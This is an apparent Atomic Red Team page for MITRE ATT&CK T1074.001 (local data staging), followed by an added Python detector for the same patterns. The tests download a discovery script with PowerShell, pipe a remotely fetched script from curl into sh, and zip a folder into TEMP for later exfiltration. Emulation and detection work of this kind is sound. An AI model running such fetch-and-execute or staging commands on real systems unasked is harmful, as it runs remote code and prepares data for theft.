Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location. Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory.
Supported Platforms: Windows
auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save downloaded discovery.bat file | path | $env:TEMP\discovery.bat |

Attack Commands: Run with powershell

```powershell
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file}
```

Cleanup Commands:

```powershell
Remove-Item -Force #{output_file} -ErrorAction Ignore
```
Utilize curl to download discovery.sh and execute a basic information gathering shell script.
Supported Platforms: Linux, macOS
auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save the output of the downloaded discovery.sh script | path | /tmp/T1074.001_discovery.log |

Attack Commands: Run with sh

```sh
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}
```

Cleanup Commands:

```sh
rm #{output_file}
```

Dependencies: Run with sh

Check Prereq Commands:

```sh
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
```

Get Prereq Commands:

```sh
# Grouped so that a successful apt install does not fall through into the pkg branch
# (&& and || have equal precedence in sh, so the ungrouped form ran both).
(which apt && apt update && apt install -y curl) || (which pkg && pkg update && pkg install -y curl)
```
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory.
Supported Platforms: Windows
auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Location to save zipped file or folder | path | $env:TEMP\Folder_to_zip.zip |
| input_file | Location of file or folder to zip | path | PathToAtomicsFolder\T1074.001\bin\Folder_to_zip |

Attack Commands: Run with powershell

```powershell
Compress-Archive -Path "#{input_file}" -DestinationPath #{output_file} -Force
```

Cleanup Commands:

```powershell
Remove-Item -Path #{output_file} -ErrorAction Ignore
```
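As an added example that is not part of the Atomic Red Team project, the following Python pass flags the three staging patterns exercised above (a download written with -OutFile, an archive written with -DestinationPath, and curl piped to sh with its output redirected) whenever the write target is a temp directory. It assumes command-line telemetry such as PowerShell ScriptBlock or auditd EXECVE records; the sample events, host names and user names are constructed.

```python
import re

# Constructed command-line telemetry (e.g. PowerShell ScriptBlock / auditd EXECVE
# records): three lines mirror the tests above, two are benign noise.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice",
     "cmd": 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/'
            'atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" '
            '-OutFile C:\\Users\\alice\\AppData\\Local\\Temp\\discovery.bat'},
    {"host": "ws01", "user": "alice",
     "cmd": 'Compress-Archive -Path "C:\\AtomicRedTeam\\atomics\\T1074.001\\bin\\'
            'Folder_to_zip" -DestinationPath $env:TEMP\\Folder_to_zip.zip -Force'},
    {"host": "srv02", "user": "bob",
     "cmd": 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/'
            'master/atomics/T1074.001/src/Discovery.sh | sh -s > /tmp/T1074.001_discovery.log'},
    {"host": "ws01", "user": "alice",
     "cmd": 'Compress-Archive -Path C:\\Projects\\report -DestinationPath C:\\Users\\alice\\Documents\\report.zip'},
    {"host": "srv02", "user": "bob", "cmd": "curl -s https://example.com/status"},
]

# Destinations commonly used for local staging (every default on this page lands in one).
STAGING_DIR = re.compile(r"(?i)(\\temp\\|%temp%|\$env:temp|^/tmp/|^/var/tmp/|/dev/shm/)")

# Each rule captures the write target in its last group.
RULES = [
    ("download-to-staging", re.compile(r"(?i)invoke-webrequest\b.*-outfile\s+(\S+)")),
    ("archive-to-staging", re.compile(r"(?i)compress-archive\b.*-destinationpath\s+(\S+)")),
    ("pipe-to-shell-redirect", re.compile(r"(?i)\bcurl\b.*\|\s*(?:sh|bash)\b.*>\s*(\S+)")),
]

def classify(cmd):
    """Return (rule_name, target_path) when cmd writes into a staging dir, else None."""
    for name, pattern in RULES:
        m = pattern.search(cmd)
        if m and STAGING_DIR.search(m.group(1)):
            return name, m.group(1)
    return None

def find_staging(events):
    """Run every rule over the events and return the hits with host/user context."""
    hits = []
    for ev in events:
        result = classify(ev["cmd"])
        if result:
            hits.append({"host": ev["host"], "user": ev["user"],
                         "rule": result[0], "path": result[1]})
    return hits
```

Writes into a user's Documents folder or a plain status request do not fire, so the rule keys on the combination of the command and the destination rather than on either alone.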